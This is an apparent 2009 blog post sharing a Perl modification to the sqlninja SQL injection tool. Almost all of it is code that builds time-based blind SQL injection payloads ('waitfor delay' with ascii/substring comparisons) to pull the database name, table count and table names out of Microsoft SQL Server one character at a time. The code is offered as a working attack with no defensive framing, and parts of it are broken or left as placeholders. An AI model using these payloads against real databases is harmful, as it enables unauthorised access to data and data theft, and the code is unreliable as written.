Monday, October 05, 2009

sqlninja mod

sub fingerprint_db (diff)
{
my $word1 = "if ascii(substring((select db_name()),";
my $word2 = ",1)) < ";
my $word3 = " waitfor delay '0:0:".$blindtime."';";

my $len1 = "if (select len(db_name())) < ";
my $len2 = " waitfor delay '0:0:".$blindtime."';";

local $/=\1;
local $|=1;

print "[+] Checking whether we are in master db...\n";
$query = "if not(select db_name()) <> 'master' waitfor delay '0:0:"
.$blindtime."'";
}
#####################
sub fingerprint_tables
{
my $minlen = 0;
my $maxlen = 30;
my $len = -1;
my $candidate;
my $query;
my $delay;
my $number_of_tables2 = " waitfor delay '0:0:".$blindtime."';";

my $number_of_tables = "if (SELECT LTRIM(STR(COUNT(name))) FROM sysobjects WHERE xtype IN ('u', 'v')) < "; #### expect an interation after this

my $word1 = "if ascii(substring(( SELECT TOP 1 name FROM sysobjects WHERE xtype IN ('u', 'v') AND name NOT IN (SELECT TOP "; ### expect $number of tables
my $word15 = " name FROM sysobjects WHERE xtype IN ('u', 'v') ORDER BY name ASC) ORDER BY name ASC), ";
my $word2 = ",1)) < ";
my $word3 = " waitfor delay '0:0:".$blindtime."';";
my $size;
local $/=\1;
local $|=1;

###############
$delay = 0; $len = 30;
################
if ($delay > ($blindtime - 2)) {
print " We seem to be in the master db :)\n";
return 1;
} else {
print " Getting the number of tables\n";
print "[+] Finding tables length... \n";
my $number = 0; #set the start number of dbs
while ($number < $maxlen) {
$query = $number_of_tables.$number.$number_of_tables2;
$delay=tryblind($query);
if ($delay < $blindtime - 2) {
$number++;
} else {
$size = $number -1;
$number=$maxlen;
}
}

print " Got it ! There are ".$size." tables \n";
print "[+] Now going for the tablenames........\n";
my $asciinum = -1;
my $charnum;
my $minchar;
my $maxchar;
my $tb_num;
my $no_of_tb;
### set no of tables == $len
$no_of_tb = $len;
for ($tb_num=0;$tb_num<=$no_of_tb;$tb_num++) {
print " Name of table ".$tb_num." is....: ";
#### loop through each table

for ($charnum=1; $charnum<=$len; $charnum++) {
$minchar=32;
$maxchar=126;
while ($asciinum < 0 ) {
$candidate = int(($minchar+$maxchar)/2);
$query=$word1.$tb_num.$word15.$charnum.$word2.$candidate.$word3;
$delay=tryblind($query);
if (($maxchar-$minchar) > 1) {
if ($delay < $blindtime - 2) {
$minchar=$candidate;
} else {
$maxchar=$candidate;
}
if ($minchar==$maxchar) {
$asciinum=$minchar;
}
} else {
if ($delay < $blindtime - 2) {
$asciinum=$maxchar-1;
} else {
$asciinum=$minchar;
}
}
}
### if you see this char number stop
if ($asciinum == 125) {
print "\n";
return 0;

}
printf("%c",$asciinum);
#print($asciinum);
$asciinum=-1;
}
print "\n";
} ### end while
return 0;
} ### end for
} ### end for

No comments: